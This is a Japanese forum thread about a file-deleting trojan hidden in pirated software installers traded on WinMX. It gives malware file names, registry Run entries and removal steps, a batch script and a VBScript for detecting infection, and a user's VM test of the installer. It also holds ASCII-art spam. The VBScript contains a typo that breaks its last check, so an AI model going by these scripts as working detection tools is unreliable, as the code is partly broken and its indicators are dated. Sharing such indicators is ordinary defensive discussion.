プレイヤーなんていろいろあるじゃん。
メディアプレイヤーなんて重くて使う気にならん。

俺はKBMプレイヤー。

条件付き電源off終了プログラム
(c:\windows\system\whismng.exeがあれば電源offしない)
chkoff.batというファイルを（メモ帳などで）新規作成し
以下をコピーして下さい

@echo off
if exist c:\windows\system\whismng.exe goto ng
goto ok
:ng
echo ウイルスかも？電源offは中止した
goto bend
:ok
RUNDLL32.EXE Shell32.dll,SHExitWindowsEx 1
:bend

使い方はchkoff.batを起動するだけ。
見て分かるかも知れませんが
if exist c:\windows\system\whismng.exe goto ng
で c:\windows\system\whismng.exe があれば電源offしないだけ
（当たり前ですが他のウイルスには無防備です）

後はvbs使える人に任せる
（だって。BATなんてｶｺﾜﾙすぎる。これをプログラムと言っていいのかぁ？）

多分、w95,w98,meでは動作し nt,2000,xpでは動作しないと思う。

で、他にウイルスが増えた場合は追加すればｏｋです。
例えば「極悪ウイルス。c:\windows\gokuaku.dllがあれば感染」
なんて情報があれば

if exist c:\windows\system\whismng.exe goto ng
if exist c:\windows\gokuaku.dll goto ng
goto ok

という行を追加すればok.

…神は無理か…民くらいにはなれただろうか…

887>>
ありがとう。時間無いからこれくらいで勘弁して。
dosはそこそこぷろぐらまの自信あるが
Windowsはダメダメぷろぐらまの自信があって
これくらいしかすぐには作れない

889>>
ぜひこのbatをwsh版にしてください
whismngが無ければ電源offの目的は達成しているけど
いきなりdosプロンプトが出たりしてｶｺﾜﾙｽｷﾞﾙ
お願いします

>>866
ありがとうございました！！
ついさっきウイルスにかかって途方にくれていたところだったのです！！！

教えてくれたやり方で無理無くファイルを削除して
再起動かけて何とか生還しました！
本当にありがとうございました！！！

>>895
再起動する前に、気がついたの？
なぜ？

ウイルス入りのソフト共有してる人は、ウイルス入りだってことに気づいてるの？
っていうか、このウイルスは他のファイルに感染しないんだよね？
だとしたら、わざとウイルス入れて共有してる？？？

c:\windows\system\whismng.exeというディレクトリ作ってそん中に適当なファイル2,3個ほっぽりこんどきゃ防げるだろ。

>>897
集めてるだけで起動しないコレクターも居るんじゃない。
あと交換用のネタとして持ってるとか。

>>896
何かよくわからないとこに行っちゃって
なにかよくわからないものインストールしちゃって

再起動しますかって聞かれたから、なにか怪しいウイルスか！！
と思ってスキャンかけてもなにもでなくて
でもなんかやな感じだったのでここをウロウロしてたら

>>866
の記事を読んで検索して調べたら案の定ウイルスでした。
あとは記事のとうりにして
再起動かけました。

もうかなり怖いのでなにか対策ソフトを買うことにします。

>>898
誰かの良レスが埋もれてる・・・・・・・

ファイル名が同じファイルは上書きできるけど、新規のファイル名と同じ名前のフォルダが存在するディレクトリには、新しくファイルを作成できないんですよね。

VBScript で書いてみた。
テキストエディタにコピーして拡張子を vbs にして保存。
ダブルクリックで実行できます。
レジストリキーの
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
を調べます。再起動する前に実行すれば気休めにはなるかも。
----------------------
On Error Resume Next
Dim Troj, i, ret, flag
flag = False

Troj = Array("Whistler", "WinSvc", "Krn132")

Set WshSHell = WScript.CreateObject("WScript.Shell")

key = "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"

For Each i in Troj
ret = WshShell.RegRead(key & i)
If ret <> "" Then
WScript.Echo i & " に感染中"
flag = True
End If
ret = ""
Next

If Flag = Flase Then
WScript.Echo "たぶん感染してません"
End If

>>901
2,3個(1個でも構わんが)ほっぽり込んどくのはunlinkされたときの用心。

>>903
同様にうちも、怪しい名前のフォルダがたくさんあります。

>>893 >>902
ご苦労様です｡自分の様にスキルのない人間のためにありがとうございます｡
俺も少しは勉強せねば・・・

>>902
どうせなら、起動時に自動実行するものを保存、落とす時に比較した方が良かねーか?

>898
感心したよ。賢いね。
後は皆で亜種のファイル名の報告をしよう。

>>906
最初はそうしようと思ったんだけど VBScript はレジストリの
キーの下にある値の一覧を取得することができないんです。
だから既知の trojan の使う値を決めうちして調べてるんです。
中途半端でｽﾏｿ

>>908
あぁ本当だ。なんて中途半端なオブジェクトなんだ >WshShell

>>902
NAVが危険だと警告してます

2000の場合は、
c:\winnt\system32\whismng.exe

でいいのかな？

昨日MXでダウンロードしたVirtualPC4.2に同種のワームを発見したよ。
ダウンロードした時にやたらと
そいつは「ソフトウェアない？」とか「ゲームない？」とか聞いてきやがったよ。
ひょっとしてどっかの組織の回し者か？

--------------------------------------
解除方法はコレネ
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ここに
Piracy c:\WINNT\System32\winsvc.exe -n
がある。これを削除

(追加情報）
ファイル名：Connectix Virtual PC 4.2 日本語版.zip
サイズ：14,496,062

>>912
違法ソフトを抹消するためにACCSが流しているのだろうか。
こんな事が続くと誰しも本物を買わざるを得ないと思う。

>>912
単に交換したかっただけと違うの？

>>914
そのために人柱が居るのだろう。

まぁ一台テスト用マシンを用意すればいいだけなんだけどね。

早速winsvc.exeというフォルダを作らなきゃね。

>>917
数ヵ月後に発病とかだったらどーすんの？

ttp://members.fortunecity.com/tqkudo/mose.html

これはどうなの？

義兵

ここに書き込んでも話が違うのかもしれないですが、つい先日、IE5.5からIE6にしようと思い、
DL完了してインストール終わって、再起動メッセージ出て再起動かけたらデスクトップの
アイコンやツールバースタートボタンなど全部無くて、ポインタと壁紙だけ・・・
唖然としてセーフモードで立ち上げたりしたのですが同じ。
詳しくないのでメーカーのサポートに電話していろいろサポートしてもらいましたが
無理で結局はリカバリして終わったのです。
サポートの人も困り果ててました。
ここに書き込みしてあるのと私の現象とは違いますよね???
私はマイクロソフトでDLしてましたから・・・
どーして起こったのか不思議でたまりません。

もしかして割れOS（尻）？って聞いてみるテスト

>>922
「インタネット」が付かないエクスプローラ.exeも逝っちゃったのかな？？？

InstallSheild6手に入れたから仕込んでやる。ヒヒヒ。

>>925
あっ、そのIS6仕込んどいたから。(藁

　((((((((((;ﾟДﾟ))))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

感染しました。

感染元はきっとAcrobat5
２ヶ月くらい前におとしてずっと使ってなかったのに何日か前にインストールした。

Win2000なのであんまり起動しないのですが１週間ぶりくらいに再起動したら
なんかOSがハングした。
おかしいと思って再起動したら「NTDIRがみつからん」とでて再起動不能。
Win2Kを再セットアップしたらフォルダを残してぜーんぶ消えてました・・・ハハ

ノー�d先生も無反応でしたね。もっと早くこのスレ見つけてたらな・・・
復旧するのもめんどうなのであきらめることにします。

唯一の後悔はなんでAcrobat4の正規版もってるのにわれAcrobat5を
インストールしたのかと言うことですね。
もうAdobeソフトは出所がはっきりしてるやつしか使いません。

長レス失礼。

>>915
＞単に交換したかっただけと違うの？
その可能性も大いに考えられる。でもその時はなんとなく彼の言動に不信感を
感じてしまったのは確か。MXを始めてからはじめて何かピンとくるような感じに
なった。まぁ、考えすぎなのかもしれないが。
それよりIPをメモっとけば良かったと思っているよ。それをここで公開して
他の人も同様に公開していけば、たぶんACCS臭いドメインが絞られるのではないかと
思うしね。

>>920ブラクラ
お勤めご苦労様。

いや、マジなんだけどさ､怪しげなインストーラ付き割れを
サイバーポリスなり何なりの機関に立ち会ってもらって
実際にデータ吹っ飛ばしてくれるかどうか実験して､
案の定データ飛んだら刑事告発するのってどうよ？

もし、仕込んでるのがソフトメーカーだって判明したら
それってえらくおもろいやん。

ノートンに引っかからない理由を知っている人、教えて。
winsvc.exe 自体をノートンでスキャンしても引っかからないんだよな。
ウィルスパターンを最新に更新しても検知しないし。

シマンテックが意図的にこの種のワームを無視しているのか？
ノートンが糞なだけか？

　　

　　　

　　今だ！おにぎりうしゲットォォォォォォ！！

　　　￣￣￣￣￣∨￣￣￣￣￣
　　　　　 ／■＼＿＿＿　　　　　　　　　　　　(´´
　　　　⊂ ・ ・ Ｐ　■　■＼〜*　　　　　(´⌒(´
　　　⊂ （ Д⊂　■　■　つつ≡≡≡(´⌒;;;≡≡≡
ﾝﾓｰｰｰｰｰｰｰｰｰｰｰｰｰｯｯｯ　　(´⌒(´⌒;;

今だ！！ﾌｻｷﾞｺｳｼゲットｵｫｫｫｫｫｫｫｫｫｫ！！！！
　　　　
　　￣￣￣￣￣Ｖ￣￣￣￣￣
　　　　　　Ａ,,Ａ　,,,,,,,,,,,,,,,,,,　　　　　　　　　　　　(´´
　　　　⊂,,ﾟ　ﾟ,,Ｐ　■,,　,,,■彡〜*　　　　　(´⌒(´
　　　⊂,（ Д⊂,,,,,■,,,,,,■,,,つ,つ≡≡≡(´⌒;;;≡≡≡
ﾝﾓｰｰｰｰｰｰｰｰｰｰｰｰｰｯｯｯ　　(´⌒(´⌒;;

今だ！！なっちうし背中ゲットだべ
　　　　　　　　
　　　￣￣￣￣Ｖ￣￣￣￣　　　　　　　　　　(´´
⊂（●ー●）⊂■　■つつ　　　　　　　　　(´⌒(´⌒(´´
　⊂、　、Ｐ　　■　■│〜*　　≡≡≡(´⌒;;;≡≡≡
　　 ∀∀　■　■　／　ﾝﾓｰｰｰｰｰｰｰｰｯｯｯ　　(´⌒(´⌒;;

>>929
>その可能性も大いに考えられる。でもその時はなんとなく彼の言動に不信感を
>感じてしまったのは確か。

そのときは、ちゃんと何かと交換してあげたの？

ワームの名前のフォルダを作るという対策ですけど、
実際にワームを持っている方、VirtualPC等で試していただけませんか？
その時にワームがどういう挙動を示すのかを。

940

>>937
＞そのときは、ちゃんと何かと交換してあげたの？
WZエディタを持っていったような記憶があるけど、もう忘れた。

>>939
やってみた。VMwareだけど。
フルアクセスを不可にしたwinsvc.exeフォルダをc:\WINNT\System32
に配置した。で、セットアップと・・・
すると結果は俺の予想に反して、いきなり削除作業が開始した。
HDの激しいアクセス音と共に見る見るうちにファイルのアイコンが消えていった。
タスクマネージャを見ると、Setup.exeが稼動している。
で、Setup.exeタスクを切断。すると削除が止まる。

優れものだね、このワーム（ボム）

>>941
>すると結果は俺の予想に反して、いきなり削除作業が開始した。

マジ？じゃあフォルダ作らないほうがいいんだね。

>>942
そうだね。
ってか、考え様によっちゃ、インストール完了後、再起動したときにwinsvc.exeを
起動するよりもインストール開始と同時に破壊行為に及んだ方が手っ取り早いんだけど、
なんで、再起動後に稼動するようにしているんだろう？

そこのところの意図が読める人、厨房な俺に教えて。
ある程度の予想はできるが、「これだ！」というような理由が見つからん。

>>943
よくわからんけど、一瞬安心させてそのあと突き落とす、ってことだけなんじゃないかな。
俺は前にやられたときは、インストールしたソフトを起動して喜んだ後に
再起動してやられたから、なんか虚しくなった記憶がある。

それと、再起動したあとって、結構放っておく人が多いからかも。
実行直後だと、怪しいとおもってすぐに落とせてしまうし。

再起動かけた後、デスクトップが出るまでジーッと見てることはあんまり無いよね。

madokaにひっかかってしまいました。

windows2000なんですが手動で削除しようとして
C：をmadoka.exeとozawa.exeで検索したんですが全然ひっかからないんです。
win.iniとsystem.iniも見てみたんですがrun=って項目が見当たらないようです。
windows2000は削除方法が違うんですか？

俺の予想でも、>>945の理由がもっとも有力だね。

でも、後でレジストリをいじればキャンセルできるワームなんだし、ソフトも
利用できるんだから、本来の「不正にソフトを利用させない」といった理念からは
外れるんだよね。
それよか、「いきなり消去」の方がこの理念に合っていると思うし。
まぁ、結局のところ「不正にソフトを利用させない」よりも「奴のマシンを破壊する。うひ」
の理念の方が比重が重いからこういったワームを作ったのかな。
そう考えると、ソフトウェア会社がばら撒いたとは考えにくいんだよね。
結局、正義の味方気取りの厨房の仕業ってことか。

どっちにしても犯罪なんだがな。

起動直後って常駐ソフトとかをロードするためにハードディスクに
さかんにアクセスしているから、それに紛れてファイルを大量に削除しても
ばれにくそう。ハードディスクのシーク音がソフトのロードのために
発生しているのか、ファイルを大量削除しているために発生しているのか
見分けにくい。

> ソフトウェア会社がばら撒いたとは考えにくいんだよね
というのは同意。

>>944 >>955 の理由も思い当たるが、
本来単発のボムが「ワーム」としての機能を持つには、
ソフトウェアがあちこち流通する必要がある。
単にインストーラが破壊活動するだけなら、
インストール確認や起動確認する人からは再流通は望めない。

症状が後ほど出るっていうのは潜伏期間みたいなもので
その間に感染活動するのが一般的なウイルスのパターン。
普通のウイルスと違うのは、発病（潜伏期間終了）と感染活動が
人為的なもの（再起動と再流通）によること。

インストーラを起動させただけで破壊活動するのは
著作権法違反以前の問題だから､被害届出しとけば。

普通は
インストーラ起動→使用許諾契約に合意→インストール開始
なわけだから、使用許諾契約に合意する前に破壊活動されたのなら
被害届出したところで自分が著作権法違反に問われることは
ないだろ。

>>950
新スレきぼんぬ

嫌です。

立てたよ
http://pc.2ch.net/test/read.cgi/sec/1012296560/l50

http://www.google.co.jp/search?q=%95s%90%B3%90K&hl=ja&btnG=Google+%8C%9F%8D%F5&lr=

まもなくここは　乂1000取り合戦場乂　となります。

　 　 　 ＼∧＿ﾍ　　　　　／￣￣￣￣￣￣￣￣￣￣￣￣
　,,､,､,,,　/ ＼〇ノゝ∩ ＜　1000取り合戦、いくぞｺﾞﾙｧ！！　　　　　　　,,､,､,,,
　　　　/三√ ﾟДﾟ)　/　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿　　,,､,､,,,
　　 　　/三/| ﾟＵﾟ|＼　　　　　　,,､,､,,,　　　　　　　　　　　　　　　　　　　　　　　,,､,､,,,
　,,､,､,,,　Ｕ （:::::::::::）　　,,､,､,,,　　　　　　　　　＼オーーーーーーーッ！！／
　　 　 　//三/|三|＼　　　　　∧＿∧∧＿∧ ∧＿∧∧＿∧∧＿∧∧＿∧
　　　　　　∪　 ∪　　　　　　 （　　　　）　　　 （　　　　 ）　　　（　　　　）　　　 ）
　,,､,､,,,　　　　　　　,,､,､,,,　　∧＿∧∧＿∧∧＿∧ ∧＿∧∧＿∧∧＿∧∧＿∧
　　　　　　,,､,､,,,　　　　　　 （　　　　）　　　 （　　　　）　　　 （　　　　）　　　 （　　　　）

　

　

　

　

　

968

969

1000

合戦停止

　

　

976

977

978